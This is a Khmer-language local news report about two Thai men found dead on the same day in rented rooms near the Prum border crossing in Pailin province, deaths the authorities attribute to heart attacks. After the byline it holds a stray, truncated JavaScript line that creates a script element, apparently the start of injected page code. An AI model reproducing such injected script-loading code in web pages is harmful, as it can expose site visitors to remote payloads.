Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

ជនជាតិថៃ០២នាក់ដេកស្លាប់ក្នុងថ្ងៃតែមួយ នៅក្បែរច្រកទ្វារអន្តរជាតិព្រំ ខេត្តប៉ៃលិន

ប៉ៃលិន៖ កាលពីវេលាម៉ោង១និង៣០នាទី រំលងអាធ្រាត ថ្ងៃទី១៦ ខែមករា ឆ្នាំ២០១៧ មាន​ករណីជន​ជាតិ​ថៃដេកស្លាប់ក្នុងបន្ទប់ជួលលេខ០៨ យីហោឈ្មោះ ស្រេង អីុ ស្ថិតក្នុងភូមិផ្សារ​ព្រំ ឃុំ​ស្ទឹងកាច់ ស្រុក​សាលាក្រៅ ខេត្តប៉ៃលិន។ ជនរងគ្រោះឈ្មោះ វិឈាន សែងសុធន ភេទប្រុស កើតឆ្នាំ ១៩៤៩ មុខរបរ​មិន​ពិតប្រាកដ ស្នាក់នៅបណ្តោះអាសន្នក្នុងភូមិ ឃុំ កើតហេតុ​ខាងលើ។

បើតាមការសន្និដ្ឋាន របស់សមត្ថកិច្ចជំនាញ បានអោយដឹងថា ជនរងគ្រោះពិតជាបានស្លាប់ដោយសារ ជម្ងឺគាំងបេះដូងពិតប្រាកដមែន។ ចំណែកករណីទី២ កាលពីវេលាម៉ោង៦និង៣០នាទីព្រឹក ថ្ងៃទី១៦ ខែមករា ឆ្នាំ២០១៧ មាន​ករណីជន​ជាតិ​ថៃដេកស្លាប់ក្នុងបន្ទប់ជួល លេខ០៤ យីហោឈ្មោះ ព្រាម អ៊ួ ស្ថិតក្នុងភូមិផ្សារ​ព្រំ ឃុំ​ស្ទឹងកាច់ ស្រុក​សាលាក្រៅ ខេត្តប៉ៃលិន។

ជនរងគ្រោះឈ្មោះ អានេកគ្រឿ រតនាសែង ភេទប្រុស កើតឆ្នាំ ១៩៧៣ មុខរបរបុគ្គលិកកាស៊ីណូ Galaxy ស្នាក់នៅបណ្តោះអាសន្នក្នុងភូមិ ឃុំ កើតហេតុ​ខាងលើ។ បើតាមការសន្និដ្ឋាន របស់សមត្ថកិច្ចជំនាញ បានអោយដឹងថា ជនរងគ្រោះពិតជាបានស្លាប់ដោយសារ ជម្ងឺគាំងបេះដូងពិតប្រាកដមែន។ដោយ៖ញ៉ឹប បូរី

var d=document;var s=d.createElement(‘script’);

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More